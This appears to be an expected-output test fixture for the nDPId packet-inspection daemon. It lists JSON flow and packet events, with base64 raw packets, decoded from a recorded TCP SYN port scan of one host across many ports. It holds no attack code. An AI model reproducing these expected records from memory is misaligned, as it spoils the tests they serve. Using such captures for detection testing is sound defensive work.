+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1709,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsK00AACcG9iWsEAAIQA2GNIzTw1PdU4MZAAAAAGACEABlOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1720,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1710,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAscdYAADoGnJysEAAIQA2GNIzTB9DdU4MZAAAAAGACDAAkvAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3324,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1711,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAskloAADsGexisEAAIQA2GNIzTDPzdU4MZAAAAAGACEAAbkAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsQgQAACwG2m6sEAAIQA2GNIzTBELdU4MZAAAAAGACBAAwSgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8254,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1723,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1713,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAslhYAADkGeVysEAAIQA2GNIzTID7dU4MZAAAAAGACCAAQTgAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49159,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1724,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1714,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsJNMAACgG+5+sEAAIQA2GNIzTwAfdU4MZAAAAAGACBAB0hAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1755,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1725,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1715,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsuDsAACYGajesEAAIQA2GNIzTBtvdU4MZAAAAAGACDAAlsQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1726,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1716,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsO7gAADEG27qsEAAIQA2GNIzTA3DdU4MZAAAAAGACCAAtHAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061004,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1727,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_packet_id":1,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061004,"pkt":"ACYLMQczACWzv5HuCABFAAAsa3wAACkGs\/asEAAIQA2GNIzTAivdU4MZAAAAAGACCAAuYQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5904,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1728,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1718,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsf5AAAC0Gm+KsEAAIQA2GNIzTFxDdU4MZAAAAAGACCAAZfAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1729,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1719,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAszRsAACoGUVesEAAIQA2GNIzTD1DdU4MZAAAAAGACDAAdPAAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbKUAADIGqc2sEAAIQA2GNIzTNZrdU4MZAAAAAGACDAD28QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsvVQAAC4GXR6sEAAIQA2GNIzTBDLdU4MZAAAAAGACDAAoWgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1722,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAstv8AADQGXXOsEAAIQA2GNIzTAwndU4MZAAAAAGACBAAxgwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsbq4AADkGoMSsEAAIQA2GNIzTH5PdU4MZAAAAAGACCAAQ+QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2068,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1724,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs2EwAACoGRiasEAAIQA2GNIzTCBTdU4MZAAAAAGACDAAkeAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1094,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1735,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1725,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsPR8AADoG0VOsEAAIQA2GNIzTBEbdU4MZAAAAAGACDAAoRgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4045,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1736,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1726,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjwAADAGmjasEAAIQA2GNIzTD83dU4MZAAAAAGACBAAkvwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1737,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAs8dMAADoGHJ+sEAAIQA2GNIzTI4vdU4MZAAAAAGACDAAJAQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061006,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1738,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_packet_id":1,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061006,"pkt":"ACYLMQczACWzv5HuCABFAAAsObwAAC8G37asEAAIQA2GNIzT3aLdU4MZAAAAAGACEABK6QAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061007,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061007,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1739,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1729,"flow_packet_id":1,"flow_last_seen":1278275061007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061007,"pkt":"ACYLMQczACWzv5HuCABFAAAsqHsAACkGdvesEAAIQA2GNIzTgAndU4MZAAAAAGACCACwggAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061008,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061008,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":787,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1740,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1730,"flow_packet_id":1,"flow_last_seen":1278275061008,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061008,"pkt":"ACYLMQczACWzv5HuCABFAAAsLtsAADoG35esEAAIQA2GNIzTAxPdU4MZAAAAAGACDAApeQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1741,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1731,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsUJAAACUG0uKsEAAIQA2GNIzTI5fdU4MZAAAAAGACCAAM9QAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1732,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsmLwAAC0GgrasEAAIQA2GNIzTAiDdU4MZAAAAAGACCAAubAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061051,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061051,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1733,"flow_packet_id":1,"flow_last_seen":1278275061051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061051,"pkt":"ACYLMQczACWzv5HuCABFAAAsaTkAADMGrDmsEAAIQA2GNIzTIL\/dU4MZAAAAAGACEAAHzQAAAgQFtA=="} 